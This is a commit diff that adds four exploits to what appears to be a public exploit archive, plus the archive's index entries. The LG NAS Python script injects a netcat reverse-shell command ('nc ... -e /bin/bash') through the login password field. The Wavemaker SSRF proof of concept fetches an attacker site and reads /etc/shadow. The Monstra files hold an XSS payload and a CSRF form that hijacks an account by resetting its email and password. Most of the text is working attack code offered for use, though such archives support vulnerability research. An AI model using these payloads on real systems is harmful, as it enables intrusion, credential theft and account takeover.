DB: 2018-08-13
4 changes to exploits/shellcodes LG NAS 3718.510.a0 - Remote Command Execution Monstra 3.0.4 - Cross-Site Scripting Wavemaker Studio 6.6 - Server-Side Request Forgery Monstra-Dev 3.0.4 - Cross-Site Request Forgery(Account Hijacking)
This commit is contained in:
parent
9773c89242
commit
e5c23cdd53
5 changed files with 149 additions and 0 deletions
52
exploits/hardware/webapps/45109.py
Executable file
52
exploits/hardware/webapps/45109.py
Executable file
|
@ -0,0 +1,52 @@
|
||||||
|
# LG NAS 3718.510.a0 - Remote Command Execution
|
||||||
|
# Author: @0x616163
|
||||||
|
# Date: 2018-07-29
|
||||||
|
# Credits: https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
|
||||||
|
# CVE: N/A
|
||||||
|
# Firmware Version: 3718.510.a0
|
||||||
|
|
||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
import sys
|
||||||
|
import argparse
|
||||||
|
import requests
|
||||||
|
from collections import OrderedDict
|
||||||
|
|
||||||
|
def checkUser(target):
|
||||||
|
# Exploiting this vulnerability requires a valid user account
|
||||||
|
# on the target NAS otherwise the vulnerable code is not executed
|
||||||
|
parameters = OrderedDict([('op_mode', 'login'), ('id', 'admin'), ('password', 'pass'), ('mobile', 'false')])
|
||||||
|
r = requests.post("http://" + target + ":8000/en/php/login_check.php", data=parameters)
|
||||||
|
if r.text == "NG:WRONG PASSWORD\n":
|
||||||
|
print "[*] Valid user found: admin"
|
||||||
|
return 0
|
||||||
|
elif r.text == "NG:NO USER\n":
|
||||||
|
print "[*] User not found: admin"
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
def sendPayload(target,lhost,lport):
|
||||||
|
print "[*] Sending payload.."
|
||||||
|
try:
|
||||||
|
parameters = OrderedDict([('op_mode', 'login'), ('id', 'admin'), ('password', 'pass;/usr/bin/nc ' + lhost + " " + lport + " " + '-e /bin/bash'), ('mobile', 'false')])
|
||||||
|
r = requests.post("http://" + target + "/en/php/login_check.php", data=parameters,timeout=0.001)
|
||||||
|
except requests.exceptions.ReadTimeout:
|
||||||
|
print "[*] Payload sent. Exiting."
|
||||||
|
sys.exit(0)
|
||||||
|
|
||||||
|
return 0
|
||||||
|
def main():
|
||||||
|
parser = argparse.ArgumentParser(add_help=True, description='LG NAS Unauthenticated Remote Code Execution')
|
||||||
|
parser.add_argument('-t', action="store", dest='target', help='Target host or IP')
|
||||||
|
parser.add_argument('-l', action="store", dest='lhost', help='Local host or IP')
|
||||||
|
parser.add_argument('-p', action="store", dest='lport', help='Listening TCP port to connect back to')
|
||||||
|
results = parser.parse_args()
|
||||||
|
args = vars(results)
|
||||||
|
if len(sys.argv) < 1:
|
||||||
|
parser.print_help()
|
||||||
|
sys.exit(1)
|
||||||
|
else:
|
||||||
|
if checkUser(args['target']) == 0:
|
||||||
|
sendPayload(args['target'], args['lhost'],args['lport'])
|
||||||
|
|
||||||
|
main()
|
||||||
|
sys.exit(0)
|
35
exploits/java/webapps/45158.txt
Normal file
35
exploits/java/webapps/45158.txt
Normal file
|
@ -0,0 +1,35 @@
|
||||||
|
# Exploit Title: Wavemaker Studio 6.6 - Server-Side Request Forgery (SSRF).
|
||||||
|
# Exploit Author: Gionathan "John" Reale
|
||||||
|
# Google Dork: N/A
|
||||||
|
# Date: 2018-08-01
|
||||||
|
# Vendor Homepage: http://www.wavemaker.com/
|
||||||
|
# Software Link: https://github.com/cloudjee/wavemaker/blob/master/wavemaker/wavemaker-studio/
|
||||||
|
# Affected Version: 6.6
|
||||||
|
# Tested on: Parrot OS
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
# Description
|
||||||
|
# Wavemaker Studio 6.6 contains an exploitable unvaildated parameter allowing an
|
||||||
|
# attacker to pass dangerous content to a victim via a phishing link. The vulnerability
|
||||||
|
# can also be exploited to access sensitive data or to use the server hosting Wavemaker
|
||||||
|
# as a form of HTTP proxy among other things.
|
||||||
|
|
||||||
|
# Proof Of Concept
|
||||||
|
http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=http://attackersite.com/
|
||||||
|
http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=file///etc/shadow
|
||||||
|
|
||||||
|
# Vulnerable Code
|
||||||
|
# /wavemaker-studio/services/studioService/src/com/wavemaker/studio/StudioService.java
|
||||||
|
|
||||||
|
# Line 419-430
|
||||||
|
@ExposeToClient
|
||||||
|
public String getContent(String inUrl) throws IOException {
|
||||||
|
try {
|
||||||
|
String str = getRemoteContent(inUrl);
|
||||||
|
str = str.replace("<head>", "<head><base href='" + inUrl
|
||||||
|
+ "' /><base target='_blank' /><script>top.studio.startPageIFrameLoaded();</script>");
|
||||||
|
return str;
|
||||||
|
} catch (Exception e) {
|
||||||
|
return "";
|
||||||
|
}
|
||||||
|
}
|
17
exploits/php/webapps/45156.txt
Normal file
17
exploits/php/webapps/45156.txt
Normal file
|
@ -0,0 +1,17 @@
|
||||||
|
# Exploit Title: Monstra-Dev 3.0.4 - Cross-Site Scripting
|
||||||
|
# Date: 2018-08-04
|
||||||
|
# Exploit Author: Nainsi Gupta
|
||||||
|
# Vendor Homepage: http://monstra.org/
|
||||||
|
# Software Link: https://github.com/monstra-cms/monstra
|
||||||
|
# Product Name: Monstra-dev
|
||||||
|
# Version: 3.0.4
|
||||||
|
# Tested on: Windows 10 (Firefox/Chrome)
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
# POC
|
||||||
|
1- Go to the site ( http://server.com/monstra-dev/ ) .
|
||||||
|
2- Click on Registration page (Registration) .
|
||||||
|
3- Register by giving you name ,mail and soo on...
|
||||||
|
4- Now log In i the website.
|
||||||
|
5- After loggin in click on edit profile and in the frist name and last name copy paste this payload- in firsname paste "><svg/onload=alert(/Case/)> and in Lastname paste "><svg/onload=alert(/Test/)>
|
||||||
|
6- After saving the above changes, click on edit profile page and you will be able to see to Pop up stating "Test" and "Case".
|
41
exploits/php/webapps/45164.txt
Normal file
41
exploits/php/webapps/45164.txt
Normal file
|
@ -0,0 +1,41 @@
|
||||||
|
# Exploit Title: Monstra-Dev 3.0.4 - Cross-Site Request Forgery(Account Hijacking)
|
||||||
|
# Date: 2018-08-04
|
||||||
|
# Exploit Author: Nainsi Gupta
|
||||||
|
# Vendor Homepage: http://monstra.org/
|
||||||
|
# Product Name: Monstra-dev
|
||||||
|
# Version: 3.0.4
|
||||||
|
# Tested on: Windows 10 (Firefox/Chrome)
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
# 1. Description
|
||||||
|
# CSRF vulnerability in admin/user/edit in Monstra-dev 3.0.4 allows an attacker
|
||||||
|
# to take over a user account by modifying user's data such as email and password
|
||||||
|
|
||||||
|
# 2. Exploit and Proof of Concept
|
||||||
|
# To exploit this vulnerability, victim need to be logged in at target site namely
|
||||||
|
# victim.com and visit crafted site made by attacker namely attacker.com.
|
||||||
|
# Then an authenticated POST request will be generated from victim browser and it will
|
||||||
|
# be submit to victim.com to modify user's data to attacker desired value.
|
||||||
|
|
||||||
|
#POC:CSRF
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<!-- CSRF PoC -->
|
||||||
|
<body>
|
||||||
|
<script>history.pushState('', '', '/')</script>
|
||||||
|
<form action="http://localhost/monstra-dev/users/2/edit" method="POST">
|
||||||
|
<input type="hidden" name="csrf" value="7e172c2a395495f3e4c05912cb9f3f7f0ed8344e" />
|
||||||
|
<input type="hidden" name="user_id" value="2" />
|
||||||
|
<input type="hidden" name="login" value="guptanainisi95" />
|
||||||
|
<input type="hidden" name="firstname" value="sd" />
|
||||||
|
<input type="hidden" name="lastname" value="jkh" />
|
||||||
|
<input type="hidden" name="email" value="guptanainsi97@gmail.com" />
|
||||||
|
<input type="hidden" name="twitter" value="" />
|
||||||
|
<input type="hidden" name="skype" value="" />
|
||||||
|
<input type="hidden" name="about_me" value="ss" />
|
||||||
|
<input type="hidden" name="new_password" value="qaz" />
|
||||||
|
<input type="hidden" name="edit_profile" value="Save" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
|
@ -39756,6 +39756,7 @@ id,file,description,date,author,type,platform,port
|
||||||
45103,exploits/linux/webapps/45103.txt,"Responsive Filemanager 9.13.1 - Server-Side Request Forgery",2018-07-30,"GUIA BRAHIM FOUAD",webapps,linux,
|
45103,exploits/linux/webapps/45103.txt,"Responsive Filemanager 9.13.1 - Server-Side Request Forgery",2018-07-30,"GUIA BRAHIM FOUAD",webapps,linux,
|
||||||
45105,exploits/linux/webapps/45105.py,"H2 Database 1.4.197 - Information Disclosure",2018-07-30,owodelta,webapps,linux,
|
45105,exploits/linux/webapps/45105.py,"H2 Database 1.4.197 - Information Disclosure",2018-07-30,owodelta,webapps,linux,
|
||||||
45108,exploits/linux/webapps/45108.txt,"Craft CMS SEOmatic plugin 3.1.4 - Server-Side Template Injection",2018-07-31,0xB455,webapps,linux,
|
45108,exploits/linux/webapps/45108.txt,"Craft CMS SEOmatic plugin 3.1.4 - Server-Side Template Injection",2018-07-31,0xB455,webapps,linux,
|
||||||
|
45109,exploits/hardware/webapps/45109.py,"LG NAS 3718.510.a0 - Remote Command Execution",2018-07-31,0x616163,webapps,hardware,
|
||||||
45127,exploits/php/webapps/45127.html,"WityCMS 0.6.2 - Cross-Site Request Forgery (Password Change)",2018-08-02,"Porhai Eung",webapps,php,80
|
45127,exploits/php/webapps/45127.html,"WityCMS 0.6.2 - Cross-Site Request Forgery (Password Change)",2018-08-02,"Porhai Eung",webapps,php,80
|
||||||
45128,exploits/php/webapps/45128.txt,"TI Online Examination System v2 - Arbitrary File Download",2018-08-02,AkkuS,webapps,php,80
|
45128,exploits/php/webapps/45128.txt,"TI Online Examination System v2 - Arbitrary File Download",2018-08-02,AkkuS,webapps,php,80
|
||||||
45129,exploits/php/webapps/45129.txt,"PageResponse FB Inboxer Add-on 1.2 - 'search_field' SQL Injection",2018-08-02,AkkuS,webapps,php,80
|
45129,exploits/php/webapps/45129.txt,"PageResponse FB Inboxer Add-on 1.2 - 'search_field' SQL Injection",2018-08-02,AkkuS,webapps,php,80
|
||||||
|
@ -39775,6 +39776,9 @@ id,file,description,date,author,type,platform,port
|
||||||
45152,exploits/aspx/webapps/45152.txt,"Sitecore.Net 8.1 - Directory Traversal",2018-08-06,Chris,webapps,aspx,
|
45152,exploits/aspx/webapps/45152.txt,"Sitecore.Net 8.1 - Directory Traversal",2018-08-06,Chris,webapps,aspx,
|
||||||
45153,exploits/java/webapps/45153.txt,"LAMS < 3.1 - Cross-Site Scripting",2018-08-06,"Nikola Kojic",webapps,java,8080
|
45153,exploits/java/webapps/45153.txt,"LAMS < 3.1 - Cross-Site Scripting",2018-08-06,"Nikola Kojic",webapps,java,8080
|
||||||
45154,exploits/php/webapps/45154.html,"onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)",2018-08-06,r3m0t3nu11,webapps,php,443
|
45154,exploits/php/webapps/45154.html,"onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)",2018-08-06,r3m0t3nu11,webapps,php,443
|
||||||
|
45156,exploits/php/webapps/45156.txt,"Monstra 3.0.4 - Cross-Site Scripting",2018-08-06,"Nainsi Gupta",webapps,php,80
|
||||||
|
45158,exploits/java/webapps/45158.txt,"Wavemaker Studio 6.6 - Server-Side Request Forgery",2018-08-06,"Gionathan Reale",webapps,java,
|
||||||
|
45164,exploits/php/webapps/45164.txt,"Monstra-Dev 3.0.4 - Cross-Site Request Forgery(Account Hijacking)",2018-08-07,"Nainsi Gupta",webapps,php,
|
||||||
45172,exploits/hardware/webapps/45172.rb,"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Remote Reboot)",2018-08-09,Wadeek,webapps,hardware,80
|
45172,exploits/hardware/webapps/45172.rb,"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Remote Reboot)",2018-08-09,Wadeek,webapps,hardware,80
|
||||||
45173,exploits/hardware/webapps/45173.rb,"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Information Disclosure)",2018-08-09,Wadeek,webapps,hardware,80
|
45173,exploits/hardware/webapps/45173.rb,"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Information Disclosure)",2018-08-09,Wadeek,webapps,hardware,80
|
||||||
45177,exploits/php/webapps/45177.txt,"Zimbra 8.6.0_GA_1153 - Cross-Site Scripting",2018-08-10,"Dino Barlattani",webapps,php,
|
45177,exploits/php/webapps/45177.txt,"Zimbra 8.6.0_GA_1153 - Cross-Site Scripting",2018-08-10,"Dino Barlattani",webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue